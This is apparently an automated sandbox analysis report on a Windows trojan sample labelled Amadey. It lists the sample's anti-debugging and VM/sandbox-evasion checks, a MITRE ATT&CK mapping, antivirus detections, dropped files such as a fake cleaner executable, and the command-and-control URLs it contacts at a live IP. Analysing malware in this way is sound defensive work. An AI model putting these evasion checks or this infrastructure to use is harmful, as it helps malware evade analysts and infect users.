Source: Amcache.hve.6.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1hbin@
Source: BEd2lJRXFM.exe, 00000000.00000002.2661166847.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0
Source: Amcache.hve.6.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.6.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: BEd2lJRXFM.exe, 00000000.00000003.2076057799.00000000055E4000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2126571177.00000000055E4000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2151942876.00000000055E4000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2101258763.00000000055E4000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2279933985.00000000055E4000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2051007227.00000000055E4000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2228519956.00000000055E4000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2410077853.00000000055E4000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2308551283.00000000055E4000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000002.2663026428.00000000055E4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.6.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.6.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.6.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.6.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.6.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.6.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.6.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.6.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: BEd2lJRXFM.exe, 00000000.00000002.2660197534.00000000009AC000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: Amcache.hve.6.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\BEd2lJRXFM.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\BEd2lJRXFM.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\BEd2lJRXFM.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	File opened: NTICE
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	File opened: SICE
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\BEd2lJRXFM.exe

Code function: 0_2_00AB7486 rdtsc

Source: C:\Users\user\Desktop\BEd2lJRXFM.exe

Code function: 0_2_0040C0B3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

Source: C:\Users\user\Desktop\BEd2lJRXFM.exe

Code function: 0_2_00402950 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,

Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_3_04D12A6F mov eax, dword ptr fs:[00000030h]		0_3_04D12A6F
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_3_04D0E30D mov eax, dword ptr fs:[00000030h]		0_3_04D0E30D
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_0041366F mov eax, dword ptr fs:[00000030h]		0_2_0041366F
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_0040EF0D mov eax, dword ptr fs:[00000030h]		0_2_0040EF0D
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_10007A76 mov eax, dword ptr fs:[00000030h]		0_2_10007A76
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_10005F25 mov eax, dword ptr fs:[00000030h]		0_2_10005F25
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_00E09CCB push dword ptr fs:[00000030h]		0_2_00E09CCB
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_04B50D90 mov eax, dword ptr fs:[00000030h]		0_2_04B50D90
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_04B638D6 mov eax, dword ptr fs:[00000030h]		0_2_04B638D6
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_04B5092B mov eax, dword ptr fs:[00000030h]		0_2_04B5092B
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_04B5F174 mov eax, dword ptr fs:[00000030h]		0_2_04B5F174

Source: C:\Users\user\Desktop\BEd2lJRXFM.exe

Code function: 0_2_00402C70 SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,

Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_0040C0B3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_0040C0B3
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_00409949 SetUnhandledExceptionFilter,		0_2_00409949
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_00408ED5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_00408ED5
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_004097B2 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_004097B2
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_10002ADF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_10002ADF
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_04B5913C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_04B5913C
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_04B59A19 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_04B59A19
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_04B59BB0 SetUnhandledExceptionFilter,		0_2_04B59BB0
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Code function: 0_2_04B5C31A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_04B5C31A

Source: BEd2lJRXFM.exe, BEd2lJRXFM.exe, 00000000.00000002.2660197534.00000000009AC000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: sPProgram Manager

Source: C:\Users\user\Desktop\BEd2lJRXFM.exe

Code function: 0_3_04D08DB3 cpuid

Source: C:\Users\user\Desktop\BEd2lJRXFM.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\BEd2lJRXFM.exe

Code function: 0_2_00409BE5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

Source: Amcache.hve.6.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: MsMpEng.exe

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	3 Command and Scripting Interpreter	1 DLL Side-Loading	2 Process Injection	11 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	24 Virtualization/Sandbox Evasion	LSASS Memory	781 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	12 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	2 Process Injection	Security Account Manager	24 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	3 Process Discovery	Distributed Component Object Model	Input Capture	11 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	13 Software Packing	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Timestomp	DCSync	223 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
BEd2lJRXFM.exe	49%	Virustotal		Browse
BEd2lJRXFM.exe	50%	ReversingLabs	Win32.Trojan.Amadey
BEd2lJRXFM.exe	100%	Avira	HEUR/AGEN.1320706
BEd2lJRXFM.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\soft[1]	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\RW3K9d2N3G7523VWAEKe2F3YfY1G\Y-Cleaner.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\dll[1]	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\soft[1]	75%	ReversingLabs	ByteCode-MSIL.Trojan.Malgent
C:\Users\user\AppData\Local\Temp\RW3K9d2N3G7523VWAEKe2F3YfY1G\Bunifu_UI_v1.5.3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\RW3K9d2N3G7523VWAEKe2F3YfY1G\Y-Cleaner.exe	75%	ReversingLabs	ByteCode-MSIL.Trojan.Malgent

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

⊘No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.156.73.23/soft/download	false		unknown
http://185.156.73.23/add?substr=mixtwo&s=three&sub=emp	false		unknown
http://185.156.73.23/dll/download	false		unknown
http://185.156.73.23/files/download	false		unknown
http://185.156.73.23/dll/key	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://185.156.73.23/files/downloadK	BEd2lJRXFM.exe, 00000000.00000003.2254390677.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2202860230.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2279905465.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2228492222.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2177270906.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2101204465.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2126520228.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2151893529.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2308519143.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2076002235.000000000582D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.156.7	BEd2lJRXFM.exe, 00000000.00000003.2101204465.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2126520228.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2076002235.000000000582D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.156.73.23/files/downloadC5A	BEd2lJRXFM.exe, 00000000.00000003.2254390677.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2202860230.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2279905465.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2228492222.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2177270906.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2101204465.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2126520228.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2151893529.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2308519143.000000000582D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.156.7_	BEd2lJRXFM.exe, 00000000.00000003.2254390677.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2202860230.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2279905465.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2228492222.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2177270906.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2101204465.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2126520228.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2151893529.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2308519143.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2076002235.000000000582D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.156.73.23/files/download23/files/downloadft	BEd2lJRXFM.exe, 00000000.00000003.2279933985.00000000055D3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.156.73.23/files/downloadU	BEd2lJRXFM.exe, 00000000.00000003.2254390677.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2202860230.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2279905465.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2228492222.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2177270906.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2308519143.000000000582D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.156.73.23/files/downloadLMEM	BEd2lJRXFM.exe, 00000000.00000003.2410077853.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2202895015.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2228519956.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2254421495.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2308551283.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2126571177.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2177304292.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2279933985.00000000055D3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.156.73.23/files/downloadX	BEd2lJRXFM.exe, 00000000.00000003.2050951523.000000000582D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://upx.sf.net	Amcache.hve.6.dr	false		high
http://185.156.7S	BEd2lJRXFM.exe, 00000000.00000003.2101204465.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2126520228.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2076002235.000000000582D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.156.73.23/files/downloadc	BEd2lJRXFM.exe, 00000000.00000003.2308519143.000000000582D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174	BEd2lJRXFM.exe, 00000000.00000003.2409955085.00000000057F0000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2412632116.0000000005832000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2411478136.00000000057F0000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2415934176.0000000005849000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2414831751.00000000057F0000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2410006333.00000000056A2000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2413734437.0000000005A41000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2410291872.0000000005850000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.dr	false		high
http://185.156.73.23/files/download56.7	BEd2lJRXFM.exe, 00000000.00000003.2254390677.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2202860230.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2279905465.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2228492222.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2177270906.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2151893529.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2308519143.000000000582D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.156.73.23/files/download23/files/downloadLMEM	BEd2lJRXFM.exe, 00000000.00000003.2151942876.00000000055D3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.156.73.23/files/download23/files/download	BEd2lJRXFM.exe, 00000000.00000003.2410077853.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2202895015.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2228519956.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2254421495.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2308551283.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2177304292.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2279933985.00000000055D3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.156.73.23/add?substr=mixtwo&s=three&sub=emppN	BEd2lJRXFM.exe, 00000000.00000003.2202895015.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2126571177.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2177304292.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2101258763.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2051007227.00000000055D2000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2076057799.00000000055D2000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2151942876.00000000055D3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.156.73.23/files/downloadData	BEd2lJRXFM.exe, 00000000.00000003.2254421495.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2308551283.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2126571177.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2177304292.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2151942876.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2279933985.00000000055D3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.156.73.23/files/download-	BEd2lJRXFM.exe, 00000000.00000003.2254390677.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2202860230.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2279905465.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2228492222.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2308519143.000000000582D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.156.73.23/files/downloado	BEd2lJRXFM.exe, 00000000.00000003.2254390677.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2202860230.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2279905465.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2228492222.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2177270906.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2101204465.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2126520228.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2151893529.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2308519143.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2076002235.000000000582D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.156.73.23/add?substr=mixtwo&s=three&sub=empf	BEd2lJRXFM.exe, 00000000.00000002.2661166847.0000000000EA7000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.156.73.23/files/download5	BEd2lJRXFM.exe, 00000000.00000003.2254390677.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2202860230.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2279905465.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2228492222.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2177270906.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2101204465.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2126520228.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2151893529.000000000582D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
